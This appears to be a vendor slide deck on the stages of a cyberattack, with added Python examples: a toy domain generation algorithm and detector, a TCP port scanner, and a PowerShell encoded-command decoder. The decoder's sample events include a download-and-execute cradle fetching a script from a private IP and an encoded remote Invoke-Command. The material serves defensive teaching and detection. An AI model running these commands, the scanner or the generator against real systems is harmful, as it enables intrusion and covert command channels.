Total Endpoint Protection: #1 in EDR & Next-Gen AV

Are you under attack?
The attack lifecycle: Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
External Recon
o People / social engineering
  • Conferences
  • Call the help desk or an admin
o Technology
  • External scans
  • Buy information and tools on the black market
o Business intelligence
  • Trusted relationships
  • 3rd-party vendors

“Even Rao, a highly experienced cybersecurity researcher, nearly fell for the scam, as he happened to have recently mailed a package via UPS.”
Initial Infection
o Phishing and spear phishing
o Vulnerability exploit
o Infected USB drive
Initial Infection: Process Injection
Running attacker code as a thread inside another, legitimate process
o Evasion: the code executes under a trusted process name
o Reading the host process's memory
o Altering the host process's behavior
o Persistence for as long as the host process runs
Initial Infection: Fileless Malware
Malicious code launches and carries out the infection from within a legitimate tool or process
o Unlike traditional malware, it does not write a file to disk
o Runs in the memory of the device
Examples of abused processes and tools
o Legitimate Windows processes
o Windows Management Instrumentation (WMI)
o Meterpreter
o Remote command execution
Command & Control
Why
o Establish and maintain a connection to:
  • Execute malicious code
  • Update the malware
  • Send back collected information
  • Provide a heartbeat indicating the attack is still alive
How
o Legitimate-looking HTTP
o Legitimate-looking DNS requests
o Fast flux
o Tor
o IRC
o Facebook / Twitter / YouTube comments
o Domain generation algorithm (DGA)
Command & Control: Domain Generation Algorithm
o C&C servers quickly get blacklisted
o A DGA generates thousands of candidate domains
  • Predictable to the attacker, unpredictable to the security researcher
  • One of them will be the live C&C
o When the C&C domain is blacklisted, the attacker:
  • Selects another generated domain
  • Registers it
  • Continues the attack
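The mechanism behind these bullets, as an added example that is not part of the original deck and is not any real malware family's algorithm: a toy DGA in which implant and operator share a secret seed and derive the same daily list of candidate domains, beside the kind of heuristic a defender can run over DNS query logs to spot such names. The seed value, the TLD list, the date and the detection thresholds are all constructed for this example.

```python
import hashlib
import math
from collections import Counter
from datetime import date

# Constructed for this example: neither the TLD list nor the seed comes from a real family.
TLDS = ("com", "net", "org", "info")


def dga_domains(seed: bytes, day_iso: str, count: int = 1000, length: int = 12) -> list:
    """Generate `count` candidate domains for the day given as 'YYYY-MM-DD'.

    Implant and attacker share `seed`; both derive the same list without ever
    talking to each other, so the attacker only has to register one of them.
    """
    day = date.fromisoformat(day_iso).isoformat().encode()
    domains = []
    for i in range(count):
        digest = hashlib.sha256(seed + day + i.to_bytes(4, "big")).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:length])
        tld = TLDS[digest[length] % len(TLDS)]
        domains.append(f"{label}.{tld}")
    return domains


def registrable_label(domain: str) -> str:
    """Second-level label, e.g. 'microsoftonline' for login.microsoftonline.com.
    Assumption: a single-label public suffix (co.uk-style suffixes are not handled)."""
    parts = domain.rstrip(".").lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of the label."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def vowel_ratio(s: str) -> float:
    return sum(ch in "aeiou" for ch in s) / len(s)


def looks_generated(domain: str, min_len: int = 10,
                    min_entropy: float = 3.0, max_vowels: float = 0.3) -> bool:
    """Heuristic DGA detector: long, high-entropy, consonant-heavy labels.

    Entropy alone is not enough: 'microsoftonline' has about 3.6 bits of
    entropy but a normal vowel ratio. Word-list DGAs evade this check entirely.
    """
    label = registrable_label(domain)
    if not label or len(label) < min_len:
        return False
    return shannon_entropy(label) > min_entropy and vowel_ratio(label) < max_vowels


def flag_dns_queries(queries: list) -> list:
    """Return the queried names that look algorithmically generated."""
    return [q for q in queries if looks_generated(q)]


if __name__ == "__main__":
    candidates = dga_domains(b"example-seed", "2016-09-01")  # constructed seed and date
    print("first candidates:", candidates[:3])
    print("flagged:", len(flag_dns_queries(candidates)), "of", len(candidates))
    print("benign flagged:", flag_dns_queries(["google.com", "login.microsoftonline.com"]))
```

Two practical points follow from the code. The seed is the only thing that makes the list "predictable to the attacker, unpredictable to the researcher": once a sample is reverse-engineered and the seed recovered, defenders can compute tomorrow's list and sinkhole or block it ahead of time. And the statistical check is a triage signal, not a verdict; it misses a fair share of the generated names and would need the usual allow-listing of CDN and cloud hostnames before it could page anyone.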
Privilege Escalation
Why
o Gain better persistence
o Credential dumping / user impersonation
o Operate under the radar
How
o Exploit vulnerabilities
  • Command-line vulnerabilities
  • Process injection
o Leverage improper configurations
  • Local admin rights for all users
  • Weak user lockout policies
Privilege Escalation: Exploiting Windows Vulnerabilities
o Windows kernel-mode driver vulnerabilities
o Windows Task Scheduler vulnerabilities
o Weaknesses in Windows design
  – User Account Control (UAC) bypasses
  – DLL search-order hijacking
Internal Reconnaissance
Why
o Paint a picture of the IT infrastructure
  • Who are the administrators?
  • What steps get me closer to my target?
  • What types of services are running?
o Identify the target and a path to it
How
o ARP scanning
o NetBIOS enumeration
o Port scanning
o Credential theft
Recon: Port Scanning
o Services listen on well-known ports
  • HTTP = 80, DNS = 53, etc.
o The attacker scans the subnet to find exposed and exploitable services
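What "scanning the subnet" looks like at the socket level, as an added example that is not part of the original deck and not a vendor tool: a threaded TCP connect() scanner, run here against a throwaway loopback listener so it works offline. The target listener, the port window and the thread count are constructed for the example; in the field the `ports` argument would be the well-known range and `host` each address in the subnet.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def tcp_connect_scan(host: str, ports, timeout: float = 0.5, workers: int = 64) -> list:
    """TCP connect() scan: completes a full three-way handshake on each port.

    Needs no raw-socket privileges, but every probe is a real connection in
    the target's logs, which is exactly what a detection rule for internal
    recon (many distinct ports or hosts from one source in a short window) keys on.
    """
    def probe(port: int):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success and an errno (e.g. ECONNREFUSED) otherwise
            return port if s.connect_ex((host, port)) == 0 else None

    with ThreadPoolExecutor(max_workers=workers) as pool:
        return sorted(p for p in pool.map(probe, ports) if p is not None)


def service_name(port: int) -> str:
    """Map a port to its well-known service name (HTTP = 80, DNS = 53, ...)."""
    try:
        return socket.getservbyport(port, "tcp")
    except OSError:
        return "unknown"


def start_local_target() -> tuple:
    """Constructed target for offline use: a listener on a free loopback port.
    The kernel completes handshakes into the backlog, so no accept() loop is needed."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    return srv, srv.getsockname()[1]


def demo() -> tuple:
    """Scan a small window around the constructed target; returns (target_port, open_ports)."""
    srv, port = start_local_target()
    try:
        open_ports = tcp_connect_scan("127.0.0.1", range(port - 5, port + 6))
    finally:
        srv.close()
    return port, open_ports


if __name__ == "__main__":
    target, found = demo()
    for p in found:
        print(f"127.0.0.1:{p} open ({service_name(p)})")
    print("constructed target was", target)
```

A connect() scan is the noisy variant: half-open (SYN) scans need raw sockets and do not complete the handshake, so they leave fewer application-level traces, but either way the burst of connection attempts from one endpoint is one of the cheapest signals an EDR or NetFlow sensor has for this stage.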
Recon: Credential Theft
o Mimikatz
o Windows Credential Editor (WCE)
o LaZagne
Lateral Movement
Why
o Gain access to target machines
  • Domain controllers
  • OWA (Outlook Web Access)
o Persistence
How
o Use legitimate tools maliciously
  • Pass-the-Hash / Pass-the-Ticket
  • Network shares
  • PsExec
  • RDP
  • SSH
  • PowerShell
  • SCCM
Lateral Movement: PsExec
Legitimate use: an IT admin runs PsExec to run a process on a remote machine interactively.
Malicious use: an attacker runs PsExec with stolen credentials (or stolen hashes, via Pass-the-Hash) to spread malware across the entire network.
Lateral Movement: PowerShell
Legitimate use: an IT admin runs PowerShell to monitor the firewall.
Malicious use: an attacker runs PowerShell with encoded commands to spread malware.
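The "encoded commands" on this slide are base64 of the UTF-16LE script passed to `-EncodedCommand`; the detection side has to undo exactly that. The following is an added example, not part of the original deck and not any product's rule: it shows the attacker-side encoding, the decoding, and a small triage pass over three constructed process-creation command lines (an admin's firewall query, a download cradle run with a hidden window, and an Invoke-Command hop to another host). The sample command lines, the private IP and hostname in them, and the indicator list are all constructed for the example.

```python
import base64
import re


def encode_ps(script: str) -> str:
    """Attacker side: -EncodedCommand takes base64 of the UTF-16LE script, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str):
    """Reverse of encode_ps; None when the token is not a valid encoded command."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_encoded_flag(token: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    if not token or token[0] not in "-/":
        return False
    flag = token.lstrip("-/").lower()
    return bool(flag) and (flag == "ec" or "encodedcommand".startswith(flag))


# Constructed heuristic indicators, matched as whole words; tune to your environment.
SUSPICIOUS_TERMS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
                    "frombase64string", "invoke-command", "-computername",
                    "invoke-wmimethod", "invoke-mimikatz")


def analyze(cmdline: str) -> dict:
    """Decode the encoded PowerShell command (if any) and list indicators found."""
    tokens = cmdline.split()
    decoded, indicators = None, []
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            decoded = decode_ps(tokens[i + 1].strip("\"'"))
            indicators.append("encoded command")
            break
    if re.search(r"-w\w*\s+hidden", cmdline, re.I):   # -W Hidden / -WindowStyle Hidden
        indicators.append("hidden window")
    body = (decoded or cmdline).lower()
    for term in SUSPICIOUS_TERMS:
        if re.search(r"(?<![\w-])" + re.escape(term) + r"(?![\w-])", body):
            indicators.append(term)
    return {"decoded": decoded, "indicators": indicators}


# Constructed process-creation command lines (Sysmon Event ID 1 style); not from any real host.
ADMIN_EVENT = ('powershell.exe -NoProfile -Command "Get-NetFirewallRule -Enabled True '
               '| Select-Object DisplayName,Direction"')
DOWNLOAD_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"
MALICIOUS_EVENT = ("powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc "
                   + encode_ps(DOWNLOAD_CRADLE))
LATERAL_EVENT = "powershell.exe -ec " + encode_ps(
    "Invoke-Command -ComputerName FS01 -ScriptBlock { Start-Process C:\\Users\\Public\\svc.exe }")
EVENTS = [ADMIN_EVENT, MALICIOUS_EVENT, LATERAL_EVENT]


def triage(events) -> list:
    """Return (cmdline, analysis) pairs that carry at least one indicator."""
    results = []
    for cmdline in events:
        analysis = analyze(cmdline)
        if analysis["indicators"]:
            results.append((cmdline, analysis))
    return results


if __name__ == "__main__":
    for cmdline, analysis in triage(EVENTS):
        print("ALERT:", analysis["indicators"])
        print("  decoded:", analysis["decoded"])
```

The admin's query decodes to nothing and matches no term, while the two attacker lines are caught only after decoding: the raw command line of an encoded invocation contains none of the keywords a string match would look for. That is why command-line logging that stops at "powershell.exe with a long base64 argument" is not enough on its own, and why script block logging (Event ID 4104), which records the script after decoding, is the more reliable source.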
Lateral Movement: Pass-the-Ticket
Legitimate authentication: Kerberos (diagram not reproduced)
Malicious use: Pass-the-Ticket (diagram not reproduced)
Persistence
Why
o Establish long-term access
  • The primary goal is often persistent access
How
o Scheduled tasks
o Autoruns
o Temp files
o Fileless malware
Damage
Exfiltration channels
o FTP/SSH
o Email
o DNS
o Dropbox
o Pastebin
Impact (business, profit, sabotage)
o Ransomware
o Corporate financials
o Credit card data
o System corruption
Are you under attack?

Total Enterprise Protection